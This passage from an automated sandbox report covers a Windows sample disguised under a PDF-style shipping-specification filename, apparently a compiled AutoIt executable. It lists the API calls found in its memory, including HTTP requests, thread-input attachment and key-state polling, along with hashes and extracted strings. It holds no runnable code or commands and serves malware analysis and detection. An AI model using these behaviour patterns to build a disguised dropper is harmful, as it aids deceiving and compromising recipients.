                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 00384071
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00384083
                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 0038409C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 003840AE
                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 003840F3
                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 00384108
                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 00384113
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 55ba53e8652202f4311a016b9bd6a696f0f45982ce04e60e82582be4323cc074
                                      • Instruction ID: db01b4cbfa3a43262fd29ff21cd2141572917160d64b7822c268ebee9e00bbaa
                                      • Opcode Fuzzy Hash: 55ba53e8652202f4311a016b9bd6a696f0f45982ce04e60e82582be4323cc074
                                      • Instruction Fuzzy Hash: 4631E6B2500305AFEB12EF54DC49F6ABBADFB50312F118065F905E6690DBB4ED80CB64
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0035B496
                                      • SetTextColor.GDI32(?,000000FF), ref: 0035B4A0
                                      • SetBkMode.GDI32(?,00000001), ref: 0035B4B5
                                      • GetStockObject.GDI32(00000005), ref: 0035B4BD
                                      • GetClientRect.USER32(?), ref: 003BDD63
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 003BDD7A
                                      • GetWindowDC.USER32(?), ref: 003BDD86
                                      • GetPixel.GDI32(00000000,?,?), ref: 003BDD95
                                      • ReleaseDC.USER32(?,00000000), ref: 003BDDA7
                                      • GetSysColor.USER32(00000005), ref: 003BDDC5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                      • String ID:
                                      • API String ID: 3430376129-0
                                      • Opcode ID: ffbe3b9062de37feb495efaccbc2a033b0e96e0d1d36104ffc5e1588c2146709
                                      • Instruction ID: 6fa54f7b4e912c8fa803427e14a95e88dca12ff8aaf369e4aa1e032f4fbc0a09
                                      • Opcode Fuzzy Hash: ffbe3b9062de37feb495efaccbc2a033b0e96e0d1d36104ffc5e1588c2146709
                                      • Instruction Fuzzy Hash: 23118E71100205EFDB626FA4EC08FE97B69EB05326F158235FA66E50F1CB321951DF20
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h??$|??
                                      • API String ID: 2610073882-3562383994
                                      • Opcode ID: 5691d1264f7367f4ebba05b485ccdf658c8dcb369612ad6c68d231cfa4f1f51e
                                      • Instruction ID: 41de248af1e503785b68e5ab88853378e9c1b47e5dcc4dad4cefc8bc0b083814
                                      • Opcode Fuzzy Hash: 5691d1264f7367f4ebba05b485ccdf658c8dcb369612ad6c68d231cfa4f1f51e
                                      • Instruction Fuzzy Hash: F591AF71A00219EBDF26DFA5ED44FAEBBB8EF45710F10815AF505AB280DB709944CFA0
                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003907AE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003907C2
                                      • GetFileAttributesW.KERNEL32(?), ref: 003907DA
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 003907F4
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00390806
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$AttributesFile
                                      • String ID: *.*
                                      • API String ID: 769691225-438819550
                                      • Opcode ID: e1dfc8075b57e00cb3e221200094a958411294bf73db95857632263fa1fc0a67
                                      • Instruction ID: 2fb303f2eafcf9d8cc0782d8271bdd9b6a428813674dab2c7848619cf5a032eb
                                      • Opcode Fuzzy Hash: e1dfc8075b57e00cb3e221200094a958411294bf73db95857632263fa1fc0a67
                                      • Instruction Fuzzy Hash: C5819F726043019FCF2ADF64C84596EB7E8EF89304F15882EF989DB251E730E9558B92
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003430DC
                                      • CoUninitialize.OLE32(?,00000000), ref: 00343181
                                      • UnregisterHotKey.USER32(?), ref: 003432A9
                                      • DestroyWindow.USER32(?), ref: 003B5079
                                      • FreeLibrary.KERNEL32(?), ref: 003B50F8
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003B5125
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: e3c48d66274914ca937816d3e83ed69ef3800b6f0459f303439257b742de51cc
                                      • Instruction ID: 1770f9e8fbca5b61976457569a04652671d2eb9435f904f9d909cdb225ad8107
                                      • Opcode Fuzzy Hash: e3c48d66274914ca937816d3e83ed69ef3800b6f0459f303439257b742de51cc
                                      • Instruction Fuzzy Hash: D09107346002028FC756EF14C895BA8F3E8FF15304F5542A9E50AAF662DB30BE5ACF50
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 0035CC15
                                        • Part of subcall function 0035CCCD: GetClientRect.USER32(?,?), ref: 0035CCF6
                                        • Part of subcall function 0035CCCD: GetWindowRect.USER32(?,?), ref: 0035CD37
                                        • Part of subcall function 0035CCCD: ScreenToClient.USER32(?,?), ref: 0035CD5F
                                      • GetDC.USER32 ref: 003BD137
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003BD14A
                                      • SelectObject.GDI32(00000000,00000000), ref: 003BD158
                                      • SelectObject.GDI32(00000000,00000000), ref: 003BD16D
                                      • ReleaseDC.USER32(?,00000000), ref: 003BD175
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003BD200
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: f9598d87028423da0e6acb435de51879e6cc525fb90731e4ab9b331d7d4d966f
                                      • Instruction ID: 439b84be8e144a210346ca432ea98141747a25fdfb96bac855b5916dd4fb1913
                                      • Opcode Fuzzy Hash: f9598d87028423da0e6acb435de51879e6cc525fb90731e4ab9b331d7d4d966f
                                      • Instruction Fuzzy Hash: 6C71F230400204DFCF239F68CC81EEA7BB9FF48319F194669EE555AAA6E7318845DF60
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF), ref: 0038CCA3
                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 0038CCC5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2948472770-2391861430
                                      • Opcode ID: 651301d5c199e347d3d8a5daf0e4bc9c1091f49761d9a1612aec7794007d0ec2
                                      • Instruction ID: c72edb8c7b987e31140ad957e8533c99dec361aa45a7b5a688b16ef13ad2dfeb
                                      • Opcode Fuzzy Hash: 651301d5c199e347d3d8a5daf0e4bc9c1091f49761d9a1612aec7794007d0ec2
                                      • Instruction Fuzzy Hash: 91515C72800209BBCF16FBA0CD46EEEB7B8AF04344F1041A5F5057A1A2EB716F59DB61
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0038CA8F
                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0038CAB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2948472770-3420473620
                                      • Opcode ID: b435ab121bf195c83dfea01c53dbe362f708f815407d7f4333e63afa45e46d5e
                                      • Instruction ID: e30765386f17c2796baeaa699d2f41ba88f2b2c5dd2e6766fbd526f3e7145e1e
                                      • Opcode Fuzzy Hash: b435ab121bf195c83dfea01c53dbe362f708f815407d7f4333e63afa45e46d5e
                                      • Instruction Fuzzy Hash: F8514B72900609AACF17FBA0DE46EEEB7B8AF04340F104065F5057A0A2EB756F59DB61
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                        • Part of subcall function 0035B63C: GetCursorPos.USER32(000000FF), ref: 0035B64F
                                        • Part of subcall function 0035B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                        • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                        • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 003AED3C
                                      • ImageList_EndDrag.COMCTL32 ref: 003AED42
                                      • ReleaseCapture.USER32 ref: 003AED48
                                      • SetWindowTextW.USER32(?,00000000), ref: 003AEDF0
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003AEE03
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 003AEEDC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 1924731296-2107944366
                                      • Opcode ID: 5846c5c807af9e96a0e089881872c063dc65865d3c93951f9593a60051f0c203
                                      • Instruction ID: 4e42cbc804102945c49fe17e2a8671d6f4c515f8d064180b4499a2900cb95387
                                      • Opcode Fuzzy Hash: 5846c5c807af9e96a0e089881872c063dc65865d3c93951f9593a60051f0c203
                                      • Instruction Fuzzy Hash: FC51AC70104300AFD716DF24DC9AF6A77E8FB89304F40492DF9959B2E2DB71A908CB52
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003945FF
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0039462B
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0039466D
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00394682
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0039468F
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003946BF
                                      • InternetCloseHandle.WININET(00000000), ref: 00394706
                                        • Part of subcall function 00395052: GetLastError.KERNEL32(?,?,003943CC,00000000,00000000,00000001), ref: 00395067
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                      • String ID:
                                      • API String ID: 1241431887-3916222277
                                      • Opcode ID: 76736d23d3992c57f51f470a28c6b6b452ebd0fdfdc70b89d3996256cd64780d
                                      • Instruction ID: b2015546ecf6c0e686d9fbc0f453cb014056d38ff7fa44d8f321e676917c3f53
                                      • Opcode Fuzzy Hash: 76736d23d3992c57f51f470a28c6b6b452ebd0fdfdc70b89d3996256cd64780d
                                      • Instruction Fuzzy Hash: 5D417CB1501209BFEF139F94CC89FBB77ACFF09304F01412AFA059A191D7B099468BA4
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003B36F4,00000010,?,Bad directive syntax error,003DDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003825D6
                                      • LoadStringW.USER32(00000000,?,003B36F4,00000010), ref: 003825DD
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003826A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 2734547477-4153970271
                                      • Opcode ID: 5eaccab4b8754f95ba6b902d5a8c004050b8794168ce6abb1dfa0444cf615a38
                                      • Instruction ID: 5c2710c9e5ffe6eabf9a4907ef39ea0c1bbd638b4ac4d755c447890d46fb2b0d
                                      • Opcode Fuzzy Hash: 5eaccab4b8754f95ba6b902d5a8c004050b8794168ce6abb1dfa0444cf615a38
                                      • Instruction Fuzzy Hash: 76212E3191021EBFCF13BB90CC4AEEE7779BF18304F044455F5056A0A2EB75A659DB50
                                      APIs
                                      • GetParent.USER32 ref: 0037BAE3
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 0037BAF8
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0037BB85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1290815626-3381328864
                                      • Opcode ID: 55bc6d0753a2cbe1817302a8bedbc83a7067ad8bc3ffb5aa183f06d8573eff55
                                      • Instruction ID: 6b9083ba7449aa78859dc530dffbd81aa14e1b75806c8e9011a97dec092bda71
                                      • Opcode Fuzzy Hash: 55bc6d0753a2cbe1817302a8bedbc83a7067ad8bc3ffb5aa183f06d8573eff55
                                      • Instruction Fuzzy Hash: C1110676648307FAFA376624DC07EB7B7AC9B11724F208026FE08E90D9EFA5A8118514
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003DDC00), ref: 0039B715
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003DDC00), ref: 0039B749
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0039B8C1
                                      • SysFreeString.OLEAUT32(?), ref: 0039B8EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: 664b9b0ecf5dafea2a0cd5667fb67b6f504f49d147a45a5ff9fccc18ba93938a
                                      • Instruction ID: 6dfc2a357b420e851dcad5a2284225e0160aae90defd622f90fbdf92721c24d2
                                      • Opcode Fuzzy Hash: 664b9b0ecf5dafea2a0cd5667fb67b6f504f49d147a45a5ff9fccc18ba93938a
                                      • Instruction Fuzzy Hash: 5AF15D75A00209EFCF05DF94D988EAEB7B9FF89315F118498F915AB250DB31AE41CB90
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003AB3F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 724b32f226c746ce4db4f2ade59ea3c0a0aa6ec532a7d2b6bc3c6ba59082274e
                                      • Instruction ID: 4110de587600ede52eb041b1fc05b3a16f49eabecf2c5c58819a3d21632423ab
                                      • Opcode Fuzzy Hash: 724b32f226c746ce4db4f2ade59ea3c0a0aa6ec532a7d2b6bc3c6ba59082274e
                                      • Instruction Fuzzy Hash: 09517C34A00204BFEF279F29CC89FA9BB68EB07314F644115FA55EA5E3C771E9508B51
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003BDB1B
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003BDB3C
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003BDB51
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003BDB6E
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003BDB95
                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0035A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003BDBA0
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003BDBBD
                                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0035A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003BDBC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                      • String ID:
                                      • API String ID: 1268354404-0
                                      • Opcode ID: c5d54778283d15492b189313df79fa81726cc58ef10a1e98b925ceaa28cab423
                                      • Instruction ID: e270495289bcc913afb9c3c4479fa85feb282dcfd5ce88f9562e2c04ebdb0371
                                      • Opcode Fuzzy Hash: c5d54778283d15492b189313df79fa81726cc58ef10a1e98b925ceaa28cab423
                                      • Instruction Fuzzy Hash: 69518C70600608EFDB26DF64CC81FAA77B9AB48755F110628FA46DB6A0D770ED44DB50
                                      APIs
                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 0035EAEB
                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 0035EB32
                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 003BDC86
                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003BDAD1,00000004,00000000,00000000), ref: 003BDCF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
